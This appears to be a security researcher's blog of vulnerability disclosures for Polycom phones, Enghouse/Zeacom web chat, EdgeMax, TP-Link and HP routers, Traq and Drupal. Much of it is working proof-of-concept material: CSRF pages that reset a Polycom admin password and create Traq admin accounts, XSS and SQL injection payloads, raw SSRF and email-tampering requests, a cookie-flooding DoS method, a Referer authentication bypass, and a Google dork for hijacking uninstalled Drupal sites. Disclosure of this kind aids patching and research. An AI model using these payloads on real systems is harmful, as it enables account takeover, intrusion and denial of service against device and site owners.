Poly(com) VVX, Soundstation IP 5000, SoundPoint IP 335 Vulnerabilities

Phone Model VVX 311
Part Number 3111-48350-001 Rev:A
MAC Address X
IP Mode IPv4
IP Address X
UC Software Version 5.9.1.0615
Updater Version 5.9.7.12459

This gui seems to be similar or the same to the soundpoint, Most Post requests seem vulnerable to csrf.  I can just take out the cookie login/pass that is in each request and craft a csrf.  For example the following is a csrf example that changes the admin password and turns on telnet.  This works for the VVX model however the same csrf did not work for the soundstation and soundpoint.

<html>
  <!-- Polycom VVX 5.9.1.0615 CSRF - Changes Admin pass to 123456. Also turns telnet on, login Polycom/123456 -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/192.168.128.11\/form-submit\/Utilities\/configuration\/importFile", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------402251386101268401375671906");
        xhr.withCredentials = true;
        var body = "-----------------------------402251386101268401375671906\r\n" + 
          "Content-Disposition: form-data; name=\"myfile\"; filename=\"polycomtelnet.cfg\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\x3cdevice device.set=\"1\"\x3e\n" + 
          "\x3cauth device.auth.localAdminPassword.set=\"1\" device.auth.localAdminPassword=\"123456\"/\x3e\n" + 
          "\x3ctelnet diags.telnetd.enabled=\"0\"\x3e\x3c/telnet\x3e\n" + 
          "\r\n" + 
          "-----------------------------402251386101268401375671906--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


This sends a file called polycomtelnet.cfg which basically looks like this.

<device device.set="1">
<auth device.auth.
<telnet diags.telnetd.enabled="0"></



Phone Model SoundStation IP 5000 & SoundPoint IP 335 (same firmware)
Part Number 3111-30900-001 Rev:H
MAC Address X
IP Address X
UC Software Version 4.0.14.1388
BootROM Software Version 5.0.14.0580

This is a Post Xss via csrf that both the newest firmware of soundstation and soundpoint are vulnerable to.  Given the simple Cookie: Authorization= having cookies exposed can make this easy to convert from base64.

<html>
  <!-- Post XSS via CSRF on Soundstation IP 5000 & SoundPoint IP 335 UC ver 4.0.14.1388  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.128.17/form-submit" method="POST">
      <input type="hidden" name="250:1" value=""><Script>alert(document.cookie)</Script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Most of these devices come with default logins: user/123 admin/456 . However if the company setting these up has changed them these csrf vulnerabilities could be useful.

Multiple vulnerabilities found in Enghouse/Zeacom web chat

Product: Web Chat versions 6.1.300.31, 6.2.284.34 and possibly others
Researcher: Matt Landers – mlanders@lucidcoast.com

Issue 1: Cross Site Scripting (XSS)

versions 6.1.300.31, 6.2.284.34 and possibly others

CVE-2019-16950


The “QueueName=” function shown in the Get request below allows for insertion of user supplied javascript. An example of the cross site scripting payload is shown below in a screenshot.

Proof of Concept:
 Copy and paste the following payload in to your web browser, edit the request to insert
 the name of the domain you would like to test.

 http://example.com:8088/webChat/Main.aspx?
 QueueName=CHAT48809%22%3balert(document.cookie)%2f%2f572

Issue 2: Email tampering
Version 6.1.300.31

CVE-2019-16949


A user of the web chat software is allowed to send an archive of their chat log to an email address specified at the beginning of the chat where the user enters in their name and email. This Post request can be modified to change the message as well as the end recipient of the message as seen below.

The email will have the same domain name and user as the web chat is allotted. This can be used in phishing campaigns against users on the same domain.

Proof of Concept:
 POST /WebChat/Chat.asmx/EmailTranscript HTTP/1.1
 Host: redacted.com:8088
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101
 Firefox/67.0
 Accept: /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://redacted.com:8088/webChat/Main.aspx?QueueName=CHAT
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 217
 Connection: close
 Cookie:
&ToEmail=victim@victim.com&Message=Click on this link for your refund!
 &WebServiceLocation=http://localhost:8088/WebService/

Issue 3: Server Side Request Forgery / Remote File Include

Version 6.1.300.31 is vulnerable to server side request forgery

CVE-2019-16948


In this instance, any post request we are able to replace the port number (8088) with a range of ports to determine what is visible on the internal network as opposed to what general web traffic would see on the web chat host.

The response from open ports is different than closed ports as shown in the following screen shot. The web chat software does not allow us to change protocol so anything besides http(s) will throw an error, however it is the type of error that we are seeing in the following screen shots that allows us to determine if a port is open or not.

 Proof of Concept:
 POST /WebChat/General.asmx/DeleteDataPushFilter?UserSessionID=
 &filterName=WebChatTracker HTTP/1.1
 Host: redacted.com:8088
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101
 Firefox/67.0
 Accept: /
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://redacted.com:8088/webChat/Main.aspx?QueueName=CHAT
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 43
 Connection: close
 Cookie: 
 WebServiceLocation=http://localhost:8085/WebService/

Version 6.2.284.34 is vulnerable to remote file include

CVE-2019-16951

I have included this as part of Issue 3 as I believe they are related.
Specifically with this version of the web chat software we were able to replace the localhost attribute with our own domain name. When the web chat server calls our domain after the Post request is sent, it retrieves our data and displays it.


Also worth mentioning is the amount of information sent in the request from the web chat server, to ours, reveals information the public should not have. This includes path names and internal ip addresses. See the screen shot below for examples.

Resource Consumption DOS on Edgemax v1.10.6

Resource consumption Denial of service. This was reported last year and has been fixed as of version 2.0.3 . It has been assigned CVE-2019-16889.

1: The request below shows that when you feed the beaker.session.id cookie variable a payload of 250 characters or more, the web management portal will produce an error page showing full path disclosure and more as shown in screenshots error1.png and error2.png.

GET / HTTP/1.1
Host: 192.168.1.100
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: beaker.session.id=v8iG24fDKn8x5uD3V2uICZA1FJEoUJpqH5VTa03xB5blDRNOe5AfFp2GNIBpDX8th1IO8sS5ejsz4Swm175nUvipwU211S4n4RtCv0A6r18fsgJbrrbmhFT9k2cAXF3yyg0Uu0B0wPOWP7BOrMVnXp44aHoXSfJ06ZXk7HrD5J5R9AZIgQLmGutM9ESNxw3CVJtW4Rfxeh7JE2AD04B3g78FxRgBxY82I2Gzf6ZPMsc39d37LM90dd9cFA
Connection: close
Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

EdgeosError1

EdgeosError2

2: When providing a valid length payload of 249 characters or less it will be stored as a *.cache filename in the /var/run/beaker/container_file/ directory,this can easily be turned in to a denial of service by filling up the space of the device with unique beaker.session.id requests. The web portal will display either a 500 error as shown here

DOS1

or a python error screen as shown here.

DOS2.1

Dos2.2

Typically the web portal will stop functioning after the /run mount has reached 50% by sending requests using iterations of 1-15681 as a beaker.session.id variable, however any length of payload can be used up to 249 characters. This can be recovered from by deleting all files within the /var/run/beaker/container_file/ directory.

Although once the /run mount can not accept any more files /var/log will start to fill up with complaints about not being able to write to /var/run/beaker/container_file/, then after /var/log fills up the device will stop responding all together until it has been power cycled.

3: This process can take upwards of 20 minutes, so it is a slow denial of service.

Impact

Any resources served by the edgemax device will be unavailable until the physical device has it’s power cycled, then it should function as normal. However it would be easy to just perform the attack again after it has been brought back online.

TPLink tl-wr802n Auth bypass

The TPLink tl-wr802n version 4.0 is vulnerable to authentication bypass via altering the referrer attribute.

I did not realize that this vulnerability had been previously disclosed except that the model mentioned above was not included or known about in the initial report.  I am linking to securelayer7’s finding first so that you can read it.

http://blog.securelayer7.net/time-to-disable-tp-link-home-wifi-router/

I really wanted to like this device but I couldn’t make myself use it in a public setting.  That being said tplink was very fast in providing a beta firmware for me to try which fixed the issue with this specific model.

As this vulnerability has been covered in depth, I will just provide the request screenshots of the Authenticated, Unauthenticated, and Bypass in Burp.

Authenticated

authorizedrequest

Unauthenticated

403forbidden

Next all that is required is to add the Referer: http://192.168.0.1/mainFrame.htm to the request and you will be allowed access to most functions, again check securelayer7’s post about this as it has been tested in depth.

Bypass

auth-bypass

HP R110 Wireless 11n VPN AM Router Credential exposure.

I had recently purchased a HP R110 Wireless 11n VPN AM Router (Product No: J9974A).

223867

I had noticed that it by default communicates via http instead of https, the reason this is an issue is that every single request the user sends after logging in is sent with the login and password in  get/post requests to the router.

img_20181206_181635.jpg

I apologize for the bad “screenshot” phone camera photo.

The ‘username=admin; password=admin’  shows up in every request after login.  I used the default credentials in this example so that i didn’t give my own away.
This might not seem like a big deal but anyone sniffing the network could obtain these credentials.

Traq 3.7.1 multiple vulnerabilities.

=================================================

Synopsis: Traq vulnerable to XSS, Admin account creation CSRF, SQL Injection, Lack of session timeout.

CVE:CVE-2018-20780
Product: Traq
Version: 3.7.1
Vendor site: https://traq.io/
Researcher: Matt Landers
matt@mjlanders.com
twitter.com/matthewjland
https://mjlanders.org/

=================================================

1: Username enumeration via
http://example.com/home/example/public_html/traq/users/1 = admin
http://example.com/home/example/public_html/traq/users/2 = anonymous
http://example.com/home/example/public_html/traq/users/3 = user etc etc

2: Reflected XSS
A GET reflected XSS appears in the search parameter of the following request.
https://example.com/traq/tickets?search=”>alert(document.domain)

3: CSRF – XSS
This was a post XSS combined with a csrf vulnerability in the email parameter in the following request.

<html>
<body>
history.pushState(”, ”, ‘/’)
<form action=”http://example.com/home/public_html/traq/usercp&#8221; method=”POST”>
<input type=”hidden” name=”name” value=”Administrator” />
<input type=”hidden” name=”email” value=”tt1kr&quot;&gt;&lt;img src=a onerror=alert(document.cookie)&gt;awezh” />
<input type=”hidden” name=”watch_created_tickets” value=”1″ />
<input type=”hidden” name=”locale” value=”enus” />
<input type=”hidden” name=”submit” value=”Save” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

4: CSRF – XSS
This was a post XSS combined with a csrf vulnerability in the name and email parameter in the following request.

<html>
<body>
history.pushState(”, ”, ‘/’)
<form action=”http://example.com/home/public_html/traq/admin/users/new?overlay=true&#8221; method=”POST”>
<input type=”hidden” name=”username” value=”user1″ />
<input type=”hidden” name=”name” value=”guyj&quot;&gt;&lt;img src=a onerror=alert(document.domain)&gt;mztcr” />
<input type=”hidden” name=”password” value=”userpass” />
<input type=”hidden” name=”email” value=”test@testy2.comlgfyr&quot;&gt;&lt;img src=a onerror=alert(document.cookie)&gt;jj194″ />
<input type=”hidden” name=”group_id” value=”2″ />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

5: Admin user creation via CSRF in the same request as the above mentioned item 4. The xss could be used to notify the attacker when the admin triggers the csrf, the admin account is created by setting the group id to 1 in this request.

<html>
<body>
history.pushState(”, ”, ‘/’)
<form action=”http://example.com/home/public_html/traq/admin/users/new?overlay=true&#8221; method=”POST”>
<input type=”hidden” name=”username” value=”testadmin” />
<input type=”hidden” name=”name” value=”guy smiley” />
<input type=”hidden” name=”password” value=”testadmin” />
<input type=”hidden” name=”email” value=”testadmin@evil.com” />
<input type=”hidden” name=”group_id” value=”1″ />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

6: SQL Injection via the search parameter, I was able to have sqlmap return with the database current user and database type. The following is the sql injection I used in order to achieve this.

Parameter: search (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind – WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://example.com:80/home/example/public_html/traq/dfgdfg/tickets?search=&#8217;) RLIKE (SELECT (CASE WHEN (6383=6383) THEN ” ELSE 0x28 END)) AND (‘yDch’=’yDch&order_by=component.asc

(@DamianEbelties): https://twitter.com/DamianEbelties

Sent this cleaned up payload, thanks!

“%%27)%20and%20updatexml(null,concat(0x0a,version()),null)–%20-”

7: There appears to be no session timeout, admin account stayed logged in for two days.

Drupal takeover

Google dork for populated but not installed versions of Drupal

inurl:install.php select an installation profile

negative intext result: drupal already installed
positive intext result: select an installation profile

If Drupal is populated but not installed, you can install Drupal and become admin.